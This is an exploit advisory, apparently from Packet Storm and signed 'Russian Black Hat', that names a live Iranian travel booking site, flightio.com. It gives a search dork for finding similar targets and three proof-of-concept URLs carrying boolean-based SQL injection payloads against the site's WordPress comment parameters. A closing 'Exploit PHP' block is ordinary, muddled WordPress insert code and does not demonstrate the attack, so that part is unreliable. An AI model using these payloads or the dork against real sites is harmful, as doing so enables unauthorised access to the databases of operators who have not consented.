Lucene search

K
packetstormE1.CodersPACKETSTORM:177988
HistoryApr 09, 2024 - 12:00 a.m.

Flightio.com SQL Injection

2024-04-0900:00:00
E1.Coders
packetstormsecurity.com
79
flightio.com
sql injection
security risk
post requests
iran
vulnerability
exploit
russian black hat

7.4 High

AI Score

Confidence

Low

`  
This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".  
We have repeatedly reported to this site that it has a security problem and has ignored our report.  
We want to record this security issue  
  
#########################################################################################################################  
# #  
# Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #  
# #  
# Author : E1.Coders #  
# #  
# Contact : E1.Coders [at] Mail [dot] RU #  
# #  
# Portal Link : https://flightio.com/ #  
# #  
# Security Risk : Medium #  
# #  
# Description : All target's IRanian AIRPOT websites #  
# #  
# DorK : "inurl:wp-comments-post.php%5Eauthor=" #  
# #  
#########################################################################################################################  
# #  
# Expl0iTs: #  
#  
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0  
#   
# parameter : comment_parent  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199  
---------------------------------------  
#  
# Expl0iTs:   
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319  
#   
# parameter : ak_hp_textarea  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199  
------------------------------------------------  
# # Expl0iTs:   
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999  
#   
# parameter : author  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #  
#########################################################################################################################  
# #  
# | Security Is JOCK | #  
# #  
# | Russian Black Hat | #  
# #  
#########################################################################################################################  
  
  
Exploit PHP :  
  
global $wpdb;  
  
$author = '99999999';  
$comment = 'WCRTEXTAREATESTINPUT9752286';  
$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';  
  
$wpdb->prepare(  
"INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",  
$comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author  
);  
  
$wpdb->insert('wp_comments', array(  
'comment_post_ID' => $comment_post_ID,  
'comment_author' => $comment_author,  
'comment_content' => $comment_content,  
'comment_parent' => $comment_parent,  
'akismet_comment_nonce' => $akismet_comment_nonce,  
'ak_js' => $ak_js,  
'author' => $author  
));  
`

7.4 High

AI Score

Confidence

Low